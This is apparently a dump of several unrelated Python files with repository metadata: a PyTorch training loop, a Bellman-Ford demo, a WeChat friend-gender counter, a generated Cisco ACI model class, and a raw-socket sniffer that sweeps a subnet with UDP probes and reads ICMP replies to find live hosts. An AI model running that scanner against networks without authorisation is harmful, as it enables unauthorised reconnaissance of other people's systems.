targets_val = [target.to(device) for target in targets_val]
loss_dict = model(images_val, targets_val)
losses = sum(loss for loss in loss_dict.values())
loss_dict_reduced = reduce_loss_dict(loss_dict)
losses_reduced = sum(loss for loss in loss_dict_reduced.values())
meters_val.update(loss=losses_reduced, **loss_dict_reduced)
synchronize()
logger.info(
meters_val.delimiter.join(
[
"[Validation]: ",
"eta: {eta}",
"iter: {iter}",
"{meters}",
"lr: {lr:.6f}",
"max mem: {memory:.0f}",
]
).format(
eta=eta_string,
iter=iteration,
meters=str(meters_val),
lr=optimizer.param_groups[0]["lr"],
memory=torch.cuda.max_memory_allocated() / 1024.0 / 1024.0,
)
)
if iterations <= 0:
if iteration == max_iter:
checkpointer.save("model_final", **arguments)
elif iter_warmup > 0:
if iteration == iterations + iter_warmup:
break
else:
if iteration == iterations:
break
total_training_time = time.time() - start_training_time
total_time_str = str(datetime.timedelta(seconds=total_training_time))
if iterations <= 0:
iterations = max_iter
logger.info(
"Total training time: {} ({:.4f} s / it)".format(
total_time_str, total_training_time / iterations
)
)
total_train_time = get_time_str(training_timer.total_time)
logger.info(
"Model training time: {} ({} s / iter per device)".format(
total_train_time,
training_timer.total_time / iterations
)
)
print("Training throughput: {:.3f} fps".format((iterations * cfg.SOLVER.IMS_PER_BATCH) / (training_timer.total_time)))
|
[
"abolfazl.shahbazi@intel.com"
] |
abolfazl.shahbazi@intel.com
|
69479901b7cfdb541375dc320f6e72740a4e772b
|
e7a0ed2c4752253a87ff74bad6761165a37e834b
|
/BellmanFord.py
|
f861af60616a1e7b182af0abd57db1815c5610c6
|
[] |
no_license
|
ilius/Algorithms-Python
|
09ac02ff6010e882775d22824940f22185a768c5
|
1d7d44859650ab9d36e6316c39a5d1400b3d3bc1
|
refs/heads/master
| 2021-01-17T14:27:55.846495
| 2013-11-19T20:18:30
| 2013-11-19T20:18:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import GraphLib
import DirectedEdge, ShortestPath
# negative cycle
with open('tinyEWDnc.txt', 'r') as f:
V = int(f.readline().strip())
E = int(f.readline().strip())
text = f.read()
Gnc = GraphLib.EdgeWeightedDigraph(V)
lines = text.split('\n')
for line in lines[:-1]: # last line is empty
l = line.split()
v = int(l[0])
w = int(l[1])
weight = float(l[2])
Gnc.addEdge(DirectedEdge.DEdge(v, w, weight))
# negative weight
with open('tinyEWDn.txt', 'r') as f:
V = int(f.readline().strip())
E = int(f.readline().strip())
text = f.read()
Gn = GraphLib.EdgeWeightedDigraph(V)
lines = text.split('\n')
for line in lines[:-1]: # last line is empty
l = line.split()
v = int(l[0])
w = int(l[1])
weight = float(l[2])
Gn.addEdge(DirectedEdge.DEdge(v, w, weight))
bn = ShortestPath.BellmanFord(Gn, 0)
print('has negative cycle:', bn.hasNegativeCycle())
print('has path to 6:', bn.hasPathTo(6))
print('path to 6:', bn.pathTo(6))
print('dist to 6:', bn.distTo(6))
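# Hedged sketch (added): the negative-cycle graph Gnc built above is never queried in
# the original script; the same API could be used to confirm the cycle it contains:
# bnc = ShortestPath.BellmanFord(Gnc, 0)
# print('Gnc has negative cycle:', bnc.hasNegativeCycle())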
|
[
"leslieklein@comcast.net"
] |
leslieklein@comcast.net
|
1f62074c0c85f84ac88700f413546240cba19622
|
ec78979fd8479e884ab93d723360744db5152134
|
/wechat_stat.py
|
e05254f8304d487894b38f59d8004251e12e30bd
|
[] |
no_license
|
xushubo/learn-python
|
49c5f4fab1ac0e06c91eaa6bd54159fd661de0b9
|
8cb6f0cc23d37011442a56f1c5a11f99b1179ce6
|
refs/heads/master
| 2021-01-19T17:00:05.247958
| 2017-09-03T03:22:28
| 2017-09-03T03:22:28
| 101,032,298
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,139
|
py
|
import itchat
from echarts import Echart, Legend, Pie
itchat.login()  # log in to WeChat
friends = itchat.get_friends(update=True)[0:]  # fetch the friend list
male = female = other = 0  # counters for male, female and unspecified
for i in friends[1:]:  # index 0 is the logged-in user, so start from 1; Sex: 1 = male, 2 = female
sex = i['Sex']
if sex == 1:
male +=1
elif sex == 2:
female += 1
else:
other += 1
total = len(friends[1:])
print('Total WeChat friends: %d' % total)
print('Male friends: %.2f%%' % (float(male)/total*100))
print('Female friends: %.2f%%' % (float(female)/total*100))
print('Other: %.2f%%' % (float(other)/total*100))
'''
chart = Echart("%s's WeChat friend gender ratio" % (friends[0]['NickName']), 'from WeChat')
chart.use(Pie('WeChat', [{'value': male, 'name': 'Male %.2f%%' % (float(male) / total * 100)}, {'value': female, 'name': 'Female %.2f%%' % (float(female) / total * 100)}, {'value': other, 'name': 'Other %.2f%%' % (float(other) / total * 100)}], radius=["50%", "70%"]))
chart.use(Legend(['male', 'female', 'other']))
del chart.json['xAxis']
del chart.json['yAxis']
chart.plot()
'''
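# --- Hedged alternative (added, not in the original): the same gender tally can be
# --- computed with collections.Counter; 'Sex' is the itchat friend field used above.
# from collections import Counter
# counts = Counter(friend['Sex'] for friend in friends[1:])
# male, female = counts[1], counts[2]
# other = total - male - female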
|
[
"tmac523@163.com"
] |
tmac523@163.com
|
c3b32385840796ed26b9f8080a349b5791153a94
|
97ef7d275cdbc37b45b8ce4225919a89378d59dc
|
/c3_sniffer.py
|
c67c99422f7e626a94b0705d11c05ab3f7cb8dff
|
[] |
no_license
|
tediswht/blackhatpython
|
d49dc848c0a797825e4c58eb62c92c2a37cf1730
|
52402ed624ceab5a59514b13dd0be28483807692
|
refs/heads/master
| 2020-07-25T08:35:46.095785
| 2019-10-03T02:12:56
| 2019-10-03T02:12:56
| 208,232,376
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,028
|
py
|
import struct
import socket
import os
from ctypes import *
import threading
import time
from netaddr import IPNetwork,IPAddress
host = '192.168.1.4'
subnet = "192.168.1.0/24"
mes = "hipython"
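# Note (added): host should be the IP of a local interface on the target subnet.
# Under Python 3 the probe message would need to be bytes (e.g. b"hipython") both for
# sendto() and for the payload comparison near the end of the script.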
def udp_sender(subnet,mes):
time.sleep(1)
sender = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
for ip in IPNetwork(subnet):
try:
sender.sendto(mes,("%s"%ip,65212))
print("sent to %s"%ip,65212)
except:
pass
class IP(Structure):
_fields_=[
("ihl",c_ubyte,4),
("version",c_ubyte,4),
("tos",c_ubyte),
("len",c_ushort),
("id",c_ushort),
("offset",c_ushort),
("ttl",c_ubyte),
("protocol_num",c_ubyte),
("sum",c_ushort),
("src",c_uint32),
("dst",c_uint32)
]
def __new__(self,socket_buffer=None):
return self.from_buffer_copy(socket_buffer)
def __init__(self,sock_buffer=None):
self.protocol_map={1:"ICMP",6:"TCP",17:"UDP"}
self.src_address=socket.inet_ntoa(struct.pack("<L",self.src))
self.dst_address=socket.inet_ntoa(struct.pack("<L",self.dst))
try:
self.protocol = self.protocol_map[self.protocol_num]
except:
self.protocol = str(self.protocol_num)
class ICMP(Structure):
_fields_ = [
("type",c_ubyte),
("code",c_ubyte),
("checksum",c_ushort),
("unused",c_ushort),
("next_hop_mtu",c_ushort)
]
def __new__(self,socket_buffer):
return self.from_buffer_copy(socket_buffer)
def __init__(self,socket_buffer):
pass
if os.name == "nt":
socket_pro=socket.IPPROTO_IP
else:
socket_pro=socket.IPPROTO_ICMP
sniffer=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket_pro)
sniffer.bind((host,0))
sniffer.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL,socket.RCVALL_ON)
t=threading.Thread(target=udp_sender,args=(subnet,mes))
t.start()
try:
while True:
raw_buffer = sniffer.recvfrom(65565)[0]
ip_header = IP(raw_buffer[0:20])
print("Protocol:%s %s -> %s"%(ip_header.protocol,ip_header.src_address,ip_header.dst_address))
if ip_header.protocol=="ICMP":
offset = ip_header.ihl * 4
buf = raw_buffer[offset:offset+sizeof(ICMP)]
icmp_header = ICMP(buf)
print("ICMP -> Type:%d code: %d"%(icmp_header.type,icmp_header.code))
if icmp_header.code==3 and icmp_header.type ==3 :
if IPAddress(ip_header.src_address) in IPNetwork(subnet):
if raw_buffer[len(raw_buffer)-len(mes):]==mes:
print("Host up %s"%ip_header.src_address)
except KeyboardInterrupt:
if os.name == "nt":
sniffer.ioctl(socket.SIO_RCVALL,socket.RCVALL_OFF)
|
[
"noreply@github.com"
] |
noreply@github.com
|
d05b8fe31cb2b3669e6ffacc405b55cbda7ff8b4
|
24fe1f54fee3a3df952ca26cce839cc18124357a
|
/servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/tunnel/lsite.py
|
cf53b4bf12e69f5b767bc243bd15658320be6f5d
|
[] |
no_license
|
aperiyed/servicegraph-cloudcenter
|
4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff
|
9eb7975f2f6835e1c0528563a771526896306392
|
refs/heads/master
| 2023-05-10T17:27:18.022381
| 2020-01-20T09:18:28
| 2020-01-20T09:18:28
| 235,065,676
| 0
| 0
| null | 2023-05-01T21:19:14
| 2020-01-20T09:36:37
|
Python
|
UTF-8
|
Python
| false
| false
| 5,189
|
py
|
# coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class LSite(Mo):
"""
Mo doc not defined in techpub!!!
"""
meta = ClassMeta("cobra.model.tunnel.LSite")
meta.moClassName = "tunnelLSite"
meta.rnFormat = "lsite-%(id)s"
meta.category = MoCategory.REGULAR
meta.label = "Tunnel info for the local site in a multisite topology"
meta.writeAccessMask = 0x400000000001
meta.readAccessMask = 0x400000000001
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.l3.Inst")
meta.superClasses.add("cobra.model.pol.Instr")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.rnPrefixes = [
('lsite-', True),
]
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "descr", "descr", 5581, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "etep", "etep", 33221, PropCategory.REGULAR)
prop.label = "ETEP IP"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("etep", prop)
prop = PropMeta("str", "id", "id", 33222, PropCategory.REGULAR)
prop.label = "Site ID"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("id", prop)
prop = PropMeta("str", "lcOwn", "lcOwn", 9, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "local"
prop._addConstant("implicit", "implicit", 4)
prop._addConstant("local", "local", 0)
prop._addConstant("policy", "policy", 1)
prop._addConstant("replica", "replica", 2)
prop._addConstant("resolveOnBehalf", "resolvedonbehalf", 3)
meta.props.add("lcOwn", prop)
prop = PropMeta("str", "modTs", "modTs", 7, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "never"
prop._addConstant("never", "never", 0)
meta.props.add("modTs", prop)
prop = PropMeta("str", "name", "name", 4991, PropCategory.REGULAR)
prop.label = "Name"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 64)]
prop.regex = ['[a-zA-Z0-9_.:-]+']
meta.props.add("name", prop)
prop = PropMeta("str", "nameAlias", "nameAlias", 28417, PropCategory.REGULAR)
prop.label = "Name alias"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 63)]
prop.regex = ['[a-zA-Z0-9_.-]+']
meta.props.add("nameAlias", prop)
prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN)
prop.label = "None"
prop.isRn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("rn", prop)
prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("created", "created", 2)
prop._addConstant("deleted", "deleted", 8)
prop._addConstant("modified", "modified", 4)
meta.props.add("status", prop)
meta.namingProps.append(getattr(meta.props, "id"))
def __init__(self, parentMoOrDn, id, markDirty=True, **creationProps):
namingVals = [id]
Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps)
# End of package file
# ##################################################
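# --- Hedged usage sketch (added; not part of the generated model file) ---
# tunnelLSite is marked read-only above, so in practice it is queried rather than
# configured. Assuming a reachable APIC and the standard cobra SDK; the URL and
# credentials below are illustrative placeholders:
#
#   from cobra.mit.access import MoDirectory
#   from cobra.mit.session import LoginSession
#   md = MoDirectory(LoginSession('https://apic.example.com', 'admin', 'password'))
#   md.login()
#   for lsite in md.lookupByClass('tunnelLSite'):
#       print(lsite.dn, lsite.id, lsite.etep)
#   md.logout()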
|
[
"rrishike@cisco.com"
] |
rrishike@cisco.com
|